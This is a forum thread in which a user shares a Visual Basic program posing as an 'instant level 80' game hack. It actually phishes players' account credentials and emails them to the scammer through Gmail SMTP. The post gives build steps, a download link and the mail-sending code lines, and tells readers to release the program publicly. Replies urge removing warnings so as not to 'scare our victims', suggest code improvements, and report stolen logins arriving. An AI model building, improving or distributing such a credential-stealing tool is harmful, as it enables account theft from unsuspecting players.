Sexy, +2 rep.
Contributor Shanx's
Instant 80 - Multi Hack Scam v1.5
( Also, i know Some of it says DeathKnight, but It was origianally was making a DK hack, but it ended up as a instant 80 hack, but anyway, the person u give this to will NOT see the Dk part, but WILL see the instant 80 Part. )
I made this program, so it tricks someone into thinking they can get there character INSTANTLY to 80, just by making a few clicks on a program.
Here's some pics of my program.
First Page
Last Page
Want it?
Requirement:
2.) Gmail account
What to do to get it?
1.) Download "visual basic 2008"
2.) Download this file:
http://www.mediafire.com/?wjeykzrzytz
3.) And Save it Into this folder: C:\Documents and Settings\user\My Documents\Visual Studio 2008\Projects
4.) Now go here: C:\Documents and Settings\user\My Documents\Visual Studio 2008\Projects\Death Knight - Multi Realm Hack v1.5\Death Knight - Multi Realm Hack v1.5\Visual Basic Project File
5.) Now click this:
6.) Double Click on "form2"
7.) Double Click On the "ACTIVATE" button ON the Program Viewer.
8.) Change: The Following From Yellow to your Gmail Address.
MyMailMessage.From = New MailAddress("[email protected]")
MyMailMessage.To.Add("[email protected]")
And then Put your GMAIL Information here
SMTPServer.Credentials = New System.Net.NetworkCredential("Email here", "Pass here")
________________________________________________________________________________ ___________________________________
9.) Click save, and Goto this Directory, Which will have your program In it.
C:\Documents and Settings\user\My Documents\Visual Studio 2008\Projects\Death Knight - Multi Realm Hack v1.5\Death Knight - Multi Realm Hack v1.5\bin\Debug\Instant 80 - Hack
Or Whatevers close to that. ( Anyway, its your EXE File Of the program )
10.) Release to the public.
11. Rinse, repeat.
Theres No viruses.
I Know there are NO viruses because well.. I Made it ^^ And i swear on My Contributor account.
Feel free to Flame / Give comments on my Program. Thnx
Last edited by ShAnX; 12-05-2008 at 07:33 AM.
Sexy, +2 rep.
Nice post, i'll try it out and give feedback.
“The object of opening the mind, as of opening the mouth, is to shut it again on something solid.”
Hmm nice. I was working on something like this too but not so fancy... +rep from me!
Power corrupts, and absolute power corrupts absolutely.
Looks like you didn't encrypt it... the Gmail password can be found easily by anyone who knows what they are doing unless it is encrypted =\
Actually, i did a small encryption on the .sft section on the Core of the program, making it impossible to be reversed Engineer or someone finding the Email in the Program
Thx so much this is truley great! +Rep
KIRBY TIME! <(^.^<) <(^.^)> (>^.^)> "Dam Skippy Son"
I like the idea-- but that first page with all the warnings is going to scare people away... were scammers, I dont see the need to WARN anyone... take that out and it will be epicness
+2rep tho because I will surely use this
I will use this also, and do as 7itanium Said. Don't have that warning up, it will scare our victims
/Crab
haha at first I thought you were trying to tell me it got me to 80 and i was like bull shit!! but then i learned it was to scam someone haha nice![]()
so a phisher hey v nice will rep if its any good.
Some suggestions (from a programming point of view)
On the first page, remove the timer stuff. Thats the most ridiculous I've seen way to check if they are ticked or not.
Delete all the code on form 1, delete the timer, delete the disagree box, and use this code instead:
Otherwise nice. I like your emailing routine, I didn't know about the SMTP client stuff before. +Rep for contributing.Code:Public Class Form1 Private Sub Button1_Click_1(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Me.Hide() Form2.Show() End Sub Private Sub Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button3.Click Me.Close() End Sub Private Sub CheckBoxChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles CheckBox1.CheckedChanged If CheckBox1.Checked Then Button1.Enabled = True Else Button1.Enabled = False End If End Sub End Class
very nice Shanx, I will test it out and tell ya what I think.
Naice! I only recommend cleaning up the UI of it... Like the GM Power Hack Scam which has a picture in the background, I could instantly tell it was a scam... Maybe try to fix it. However I am using it, and getting mails, 1 working (trial) will rep ASAP